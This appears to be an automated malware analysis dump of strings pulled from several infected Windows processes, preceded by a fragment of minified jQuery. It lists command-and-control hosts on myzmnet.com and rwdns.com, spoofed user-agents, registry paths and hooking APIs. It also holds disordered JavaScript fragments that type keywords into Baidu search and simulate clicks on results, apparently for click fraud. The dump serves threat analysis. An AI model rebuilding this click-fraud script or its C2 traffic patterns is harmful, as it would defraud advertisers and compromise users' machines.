st.access(this,function(e,i,o){var a=z(e);return o===t?a?n in a?a[n]:a.document.documentElement[i]:e[i]:(a?a.scrollTo(r?st(a).scrollLeft():o,r?o:st(a).scrollTop()):e[i]=o,t)},e,i,arguments.length,null)}}),st.each({Height:"height",Width:"width"},function(e,n){st.each({padding:"inner" e,content:n,"":"outer" e},function(r,i){st.fn[i]=function(i,o){var a=arguments.length&&(r||"boolean"!=typeof i),s=r||(i===!0||o===!0?"margin":"border");return st.access(this,function(n,r,i){var o;return st.isWindow(n)?n.document.documentElement["client" e]:9===n.nodeType?(o=n.documentElement,Math.max(n.body["scroll" e],o["scroll" e],n.body["offset" e],o["offset" e],o["client" e])):i===t?st.css(n,r,s):st.style(n,r,i,s)},n,a?i:t,a,null)}})}),e.jQuery=e.$=st,"function"==typeof define&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return st})})(window);

//@ sourceMappingURL=jquery.min.map

AdSpirit.EXE

svchost.exe_1588:

`.rsrc

FtPh

t.Ht4

Winmm.dll

DSound.dll

User32.DLL

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)

Referer: hXXp://VVV.baidu.com/s

Content-Type:application/x-www-form-urlencoded;

GetData.asp

SetData.asp

0.0.0.0

VVV.baidu.com/s?

window.alert = null;window.confirm = null;window.open = null;window.showModalDialog = null;

hXXp://VVV.baidu.com/s?wd=

url=url.toLowerCase();

hXXp://VVV.baidu.com/

VVV.baidu.com

hXXp://1.rwdns.com/zztj/yeshe.html

hXXp://1.rwdns.com/

ntdll.dll

kernel32.dll

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

%s.dll

CCmdTarget

COMCTL32.DLL

hhctrl.ocx

commctrl_DragListMsg

CNotSupportedException

CHttpConnection

CHttpFile

hXXp://

WININET.DLL

HTTP/1.0

MSWHEEL_ROLLMSG

user32.dll

ole32.dll

mscoree.dll

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

GetProcessWindowStation

OLEACC.dll

c:\Documents and Settings\Administrator\

\Suphit\Suphit6_Client\Client\Release\Client.pdb

SHELL32.dll

.?AVCCmdTarget@@

.PAVCMemoryException@@

.PAVCException@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCObject@@

.PAVCOleException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCInternetException@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.PAVCArchiveException@@

.PAVCOleDispatchException@@

.PAVCFileException@@

zcÁ

%System%\svchost.exe

GetCPInfo

RegOpenKeyExA

RegDeleteKeyA

RegEnumKeyA

RegOpenKeyA

RegCreateKeyExA

RegCloseKey

GetViewportExtEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

UrlUnescapeA

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

GetKeyState

HttpOpenRequestA

InternetOpenUrlA

HttpSendRequestA

HttpQueryInfoA

HttpAddRequestHeadersA

InternetCanonicalizeUrlA

InternetCrackUrlA

.text

`.rdata

@.data

.rsrc

zwsp.fQ

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

OLEAUT32.dll

oledlg.dll

SHLWAPI.dll

USER32.dll

WININET.dll

WINSPOOL.DRV

WS2_32.dll

var rnd = 500 parseInt(2000*Math.random());

if (el.value==kw){return true} else{return false}

el.click && el.click();

var el = document.getElementById('su1') ? document.getElementById('su1') : document.getElementById('su');

i  = 1 rnd; if (i>kw.length){i=kw.length};

var rnd = parseInt(2*Math.random());

if(i<=kw.length) setTimeout(function(){InputKW(kwNode);GoInput()},2000);

var kwNode = kw.substring(0,i);

el.value=kw;

el.focus();

el.value='';

var el = document.getElementById('kw1') ? document.getElementById('kw1') : document.getElementById('kw');

el.fireEvent('onkeyup');

el.fireEvent('onkeydown');

} else if (el.fireEvent) {

el.dispatchEvent(evt);

evt.initMouseEvent('keydown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);

evt = document.createEvent('KeyEvents');

if (document.createEvent) {

node.click && node.click();

if (node.innerHTML == '

var length = allNodes.length;

var allNodes = document.getElementsByTagName('a');

if(ESubmit.value == '

'){ESubmit.value = 'false';}

ESubmit.value = 'ok';

var cknode=GetChildN(t_a.item(0));simulateClick(cknode,false);

if (5*Math.random()<=1){

if (g_url==url){

var cknode=GetChildN(t_a.item(0));simulateClick(cknode,OpenSite);

ESubmit.value = IntPaimin.toString();

if (g_url==url.substring(1,21) '...'){

if ((g_url!=null) && (g_url.length==24) && (g_url.substring(22,3)=='...')){

var g_url = GetUrl(g);

var g = content_left.childNodes.item(i).getElementsByTagName('span');

var t_a = t.item(0).getElementsByTagName('a');

if (!t.item(0)) {continue;}

var t = content_left.childNodes.item(i).getElementsByTagName('h3');

if ((content_left.childNodes.item(i).tagName.toLowerCase()!='div')||(content_left.childNodes.item(i).className.toLowerCase().indexOf('c-container')==-1)) {continue;}

for (var i=0;i<content_left.childNodes.length;i  ){

var content_left = document.getElementById('content_left');

var url='

var result = re.exec(g_a);

g_a=g_a.replace('</b>','');

g_a=g_a.replace('<b>','');

g_a=g.item(j).innerHTML.toLowerCase();

if((g.item(j).className.toLowerCase()=='g'||g.item(j).className.toLowerCase()=='c-showurl')&&g.item(j).id==''){

for (var j=0;j<g.length;j  ){

function GetUrl(g){

if(!ckst){ESubmit.value = 'false';}

ckst = el.fireEvent('onmousedown',event);

var event = document.createEventObject();

if(Open){el.click && el.click();}

ckst = el.dispatchEvent(evt);

evt.initMouseEvent('mousedown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);

evt = document.createEvent('MouseEvents');

var ESubmit = document.getElementById('su')?document.getElementById('su'):document.getElementById('su1');

accKeyboardShortcut

{8856F961-340A-11D0-A96B-00C04FD705A2}

All Files (*.*)

No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.

#Unable to load mail system support.

Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.

Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.

Disk full while accessing %1..An attempt was made to access %1 past its end.

No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.

1.0.0.1

Client.exe

svchost.exe_1588_rwx_00400000_0004F000:

`.rsrc

FtPh

t.Ht4

Winmm.dll

DSound.dll

User32.DLL

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)

Referer: hXXp://VVV.baidu.com/s

Content-Type:application/x-www-form-urlencoded;

GetData.asp

SetData.asp

0.0.0.0

VVV.baidu.com/s?

window.alert = null;window.confirm = null;window.open = null;window.showModalDialog = null;

hXXp://VVV.baidu.com/s?wd=

url=url.toLowerCase();

hXXp://VVV.baidu.com/

VVV.baidu.com

hXXp://1.rwdns.com/zztj/yeshe.html

hXXp://1.rwdns.com/

ntdll.dll

kernel32.dll

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

%s.dll

CCmdTarget

COMCTL32.DLL

hhctrl.ocx

commctrl_DragListMsg

CNotSupportedException

CHttpConnection

CHttpFile

hXXp://

WININET.DLL

HTTP/1.0

MSWHEEL_ROLLMSG

user32.dll

ole32.dll

mscoree.dll

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

GetProcessWindowStation

OLEACC.dll

c:\Documents and Settings\Administrator\

\Suphit\Suphit6_Client\Client\Release\Client.pdb

SHELL32.dll

.?AVCCmdTarget@@

.PAVCMemoryException@@

.PAVCException@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCObject@@

.PAVCOleException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCInternetException@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.PAVCArchiveException@@

.PAVCOleDispatchException@@

.PAVCFileException@@

zcÁ

%System%\svchost.exe

GetCPInfo

RegOpenKeyExA

RegDeleteKeyA

RegEnumKeyA

RegOpenKeyA

RegCreateKeyExA

RegCloseKey

GetViewportExtEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

UrlUnescapeA

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

GetKeyState

HttpOpenRequestA

InternetOpenUrlA

HttpSendRequestA

HttpQueryInfoA

HttpAddRequestHeadersA

InternetCanonicalizeUrlA

InternetCrackUrlA

.text

`.rdata

@.data

.rsrc

zwsp.fQ

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

OLEAUT32.dll

oledlg.dll

SHLWAPI.dll

USER32.dll

WININET.dll

WINSPOOL.DRV

WS2_32.dll

var rnd = 500 parseInt(2000*Math.random());

if (el.value==kw){return true} else{return false}

el.click && el.click();

var el = document.getElementById('su1') ? document.getElementById('su1') : document.getElementById('su');

i  = 1 rnd; if (i>kw.length){i=kw.length};

var rnd = parseInt(2*Math.random());

if(i<=kw.length) setTimeout(function(){InputKW(kwNode);GoInput()},2000);

var kwNode = kw.substring(0,i);

el.value=kw;

el.focus();

el.value='';

var el = document.getElementById('kw1') ? document.getElementById('kw1') : document.getElementById('kw');

el.fireEvent('onkeyup');

el.fireEvent('onkeydown');

} else if (el.fireEvent) {

el.dispatchEvent(evt);

evt.initMouseEvent('keydown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);

evt = document.createEvent('KeyEvents');

if (document.createEvent) {

node.click && node.click();

if (node.innerHTML == '

var length = allNodes.length;

var allNodes = document.getElementsByTagName('a');

if(ESubmit.value == '

'){ESubmit.value = 'false';}

ESubmit.value = 'ok';

var cknode=GetChildN(t_a.item(0));simulateClick(cknode,false);

if (5*Math.random()<=1){

if (g_url==url){

var cknode=GetChildN(t_a.item(0));simulateClick(cknode,OpenSite);

ESubmit.value = IntPaimin.toString();

if (g_url==url.substring(1,21) '...'){

if ((g_url!=null) && (g_url.length==24) && (g_url.substring(22,3)=='...')){

var g_url = GetUrl(g);

var g = content_left.childNodes.item(i).getElementsByTagName('span');

var t_a = t.item(0).getElementsByTagName('a');

if (!t.item(0)) {continue;}

var t = content_left.childNodes.item(i).getElementsByTagName('h3');

if ((content_left.childNodes.item(i).tagName.toLowerCase()!='div')||(content_left.childNodes.item(i).className.toLowerCase().indexOf('c-container')==-1)) {continue;}

for (var i=0;i<content_left.childNodes.length;i  ){

var content_left = document.getElementById('content_left');

var url='

var result = re.exec(g_a);

g_a=g_a.replace('</b>','');

g_a=g_a.replace('<b>','');

g_a=g.item(j).innerHTML.toLowerCase();

if((g.item(j).className.toLowerCase()=='g'||g.item(j).className.toLowerCase()=='c-showurl')&&g.item(j).id==''){

for (var j=0;j<g.length;j  ){

function GetUrl(g){

if(!ckst){ESubmit.value = 'false';}

ckst = el.fireEvent('onmousedown',event);

var event = document.createEventObject();

if(Open){el.click && el.click();}

ckst = el.dispatchEvent(evt);

evt.initMouseEvent('mousedown', true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);

evt = document.createEvent('MouseEvents');

var ESubmit = document.getElementById('su')?document.getElementById('su'):document.getElementById('su1');

accKeyboardShortcut

{8856F961-340A-11D0-A96B-00C04FD705A2}

All Files (*.*)

No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.

#Unable to load mail system support.

Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.

Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.

Disk full while accessing %1..An attempt was made to access %1 past its end.

No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.

1.0.0.1

Client.exe

mstsv.exe_596:

.text

`.rdata

@.data

.rsrc

GET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

WS2_32.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

MSVCRT.dll

_acmdln

iphlpapi.dll

\Program Files\Internet Explorer\iexplore.exe

%s %s %s

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/xKSYH

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE AtAtI)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

3566.myzmnet.com:3566

\??\%s\%c%c%s

\??\%s\%s

%s\%s

kernel32.DLL

ddd

SOFTWARE\Microsoft\Windows NT\Curre

winlogon.exe_1024:

.text

`.rdata

@.data

.rsrc

GET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

WS2_32.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

MSVCRT.dll

_acmdln

iphlpapi.dll

\Program Files\Internet Explorer\iexplore.exe

%s %s %s

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/xKSYH

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE AtAtI)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

3511.myzmnet.com:3511

\??\%s\%c%c%s

\??\%s\%s

%s\%s

kernel32.DLL

ddd

SOFTWARE\Microsoft\Windows NT\Curre

svchost.exe_1412:

.text

`.rdata

@.data

.rsrc

GET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

WS2_32.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

MSVCRT.dll

_acmdln

iphlpapi.dll

\Program Files\Internet Explorer\iexplore.exe

%s %s %s

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/xKSYH

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE AtAtI)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

3500.myzmnet.com:3500

\??\%s\%c%c%s

\??\%s\%s

%s\%s

kernel32.DLL

ddd

SOFTWARE\Microsoft\Windows NT\Curre

spoolsv.exe_256:

.text

`.rdata

@.data

.rsrc

GET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

WS2_32.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

MSVCRT.dll

_acmdln

iphlpapi.dll

\Program Files\Internet Explorer\iexplore.exe

%s %s %s

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/xKSYH

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE AtAtI)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

3522.myzmnet.com:3522

\??\%s\%c%c%s

\??\%s\%s

%s\%s

kernel32.DLL

ddd

SOFTWARE\Microsoft\Windows NT\Curre

spoolsc.exe_828:

.text

`.rdata

@.data

.rsrc

GET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

WS2_32.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

MSVCRT.dll

_acmdln

iphlpapi.dll

\Program Files\Internet Explorer\iexplore.exe

%s %s %s

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/xKSYH

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE AtAtI)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

3588.myzmnet.com:3588

\??\%s\%c%c%s

\??\%s\%s

%s\%s

kernel32.DLL

ddd

SOFTWARE\Microsoft\Windows NT\Curre

services.exe_308:

.text

`.rdata

@.data

.rsrc

GET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^Ruixing#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

WS2_32.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

MSVCRT.dll

_acmdln

iphlpapi.dll

\Program Files\Internet Explorer\iexplore.exe

%s %s %s

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/xKSYH

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE AtAtI)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

3555.myzmnet.com:3555

\??\%s\%c%c%s

\??\%s\%s

%s\%s

kernel32.DLL

ddd

SOFTWARE\Microsoft\Windows NT\Curre

mstsc.exe_1216:

.text

`.rdata

@.data

.rsrc

